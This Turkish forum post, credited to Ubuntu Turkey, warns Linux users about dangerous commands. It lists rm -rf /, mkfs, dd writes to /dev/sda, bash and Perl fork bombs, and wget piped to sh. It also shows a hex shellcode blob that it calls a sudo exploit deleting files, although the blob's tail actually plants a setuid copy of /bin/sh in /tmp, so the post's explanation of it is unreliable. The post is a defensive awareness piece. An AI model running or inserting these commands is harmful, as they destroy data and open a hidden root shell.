- Konum
- BERTUNA
-
- Üyelik Tarihi
- 2 Haz 2020
-
- Mesajlar
- 5,364
-
- MFC Puanı
- 16,500
Uyarı: Bu kodlar yalnızca güvenilmeyen kaynaklardan bulduğunuz kodları karşılaştırmak içindir. Asla, ne kendi bilgisayarınızda ne de başkasının bilgisayarında kullanmayın!
Sil komutunun / diznine uygulanmasıdır. Kısaca tüm bilgisayardaki her şeyi siler.
Tüm sabit diski biçimlendirir:
Blok halindeki diske çiğ bilgi yazdıracak, bad sector oluşturma ve bozma
"Forkbomb": Sanki rastgele yazılmış gibi görünüyor değil mi? Yanlış. Bu "forkbomb" olarak bilinen, sistemi dondurup, iflas etmesini sağlayana kadar çok işlem çalıştırır.
Bu da aynısının Perl üzerindeki hali
"Shellscript": Eğer güvenmediğiniz birisi size bu kodu verirse, çalıştırmayın! O kişinin istediği her komutu içerebilir- zararlı ve yıkıcı olsa bile!
Ayrıca; asla güvenmediğiniz bir kimsenin verdiği kaynak kodunu çalıştırmayın! İçinde zararlı bir komut geçiyor olabilir.
Bu size rastgele bir hex kodu olarak görünebilir fakat çok riskli bir sudo güvenlik açığı.
Bu komut; aslında
kodunun hex halidir ve /home diznini normal kullanıcı olarak veya tüm dosyaları root olarak siler.
Kaynak : Ubuntu Turkey
Sil komutunun / diznine uygulanmasıdır. Kısaca tüm bilgisayardaki her şeyi siler.
Bash:
rm -rf /
rm -rf .
rm -rf *
rm -r .[^.]*
Tüm sabit diski biçimlendirir:
Bash:
mkfs
mkfs.ext3
Blok halindeki diske çiğ bilgi yazdıracak, bad sector oluşturma ve bozma
Bash:
bir_komut > /dev/sda
dd if=bir_sey of=/dev/sda
"Forkbomb": Sanki rastgele yazılmış gibi görünüyor değil mi? Yanlış. Bu "forkbomb" olarak bilinen, sistemi dondurup, iflas etmesini sağlayana kadar çok işlem çalıştırır.
Bash:
:(){:|:&};:
Bu da aynısının Perl üzerindeki hali
Bash:
fork while fork
"Shellscript": Eğer güvenmediğiniz birisi size bu kodu verirse, çalıştırmayın! O kişinin istediği her komutu içerebilir- zararlı ve yıkıcı olsa bile!
Bash:
wget http://bir_yer/bir_dosya
sh ./bir_dosya
veya
wget http://bir_yer/bir_dosya -O- | sh
Ayrıca; asla güvenmediğiniz bir kimsenin verdiği kaynak kodunu çalıştırmayın! İçinde zararlı bir komut geçiyor olabilir.
Bu size rastgele bir hex kodu olarak görünebilir fakat çok riskli bir sudo güvenlik açığı.
Bash:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Bu komut; aslında
Kod:
rm -rf ~ / &
Kaynak : Ubuntu Turkey